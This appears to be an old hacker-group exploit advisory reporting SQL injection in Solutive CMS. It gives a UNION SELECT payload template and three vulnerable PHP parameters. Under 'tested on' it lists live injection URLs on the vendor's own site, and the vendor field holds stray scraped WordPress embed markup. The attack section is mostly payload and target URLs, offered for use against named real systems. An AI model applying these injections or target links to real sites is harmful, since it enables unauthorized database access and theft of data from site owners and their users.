1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 |
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Gr33tz to ### www.Teamicw.in | www.IndiShell.in | www.AndhraHackers.com ### -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= L0v3 T0 : "R00T", "R45c4l" & "Agent: 1c3c0ld" -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ############################################################################## %// ----- [ Founder ] ----- Th3 RDX ----- [ E - mail ] ----- th3rdx@gmail.com %\\ ############################################################################## ############################################################################## %// ----- [Title] ----- Solutive CMS SQL Injection Vulnerability ----- [ Vendor ] ----- <blockquote class="wp-embedded-content" data-secret="BSg8Fd15QS"><a href="https://solutive.net/" target="_blank"rel="external nofollow" class="external" >創造有影響力的數碼體驗</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; visibility: hidden;" title="創造有影響力的數碼體驗 — WordPress 網站裝修師傅" src="https://solutive.net/embed/#?secret=neGNZ8VETS#?secret=BSg8Fd15QS" data-secret="BSg8Fd15QS" frameborder="0" marginmarginscrolling="no"></iframe> %\\ ############################################################################## ############################################################################## %// ----- [ Exploit (s) ] ----- Put [CODE] = SQL Injection Code {e.g = product_detail.php?id=7+and+1=0+ Union Select1 ,2, UNHEX(HEX([visible])) ,4,5,6 (tables & column) } [SQLi] http://server/cms/product_detail.php?id=7[CODE] [SQLi] http://server/cms/news_content.php?id=9[CODE] [SQLi] http://server/cms/products_by_cat.php?Cat_id=1[CODE] %\\ ############################################################################## ############################################################################## %// >>>>>> TESTED ON <<<<<< ----- [ Live Link (s) ] ----- [Link] http://solutive.net/cms01/product_detail.php?id=7[CODE] [Link] http://solutive.net/cms01/news_content.php?id=9[CODE] [Link] http://solutive.net/cms01/products_by_cat.php?Cat_id=1[CODE] %\\ ############################################################################## -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Thanks To All: www.Exploit-db.com | wwww.inj3ct0r.com | www.hack0wn.com -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Bug discovered : 04 April 2010 finish(0); -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= |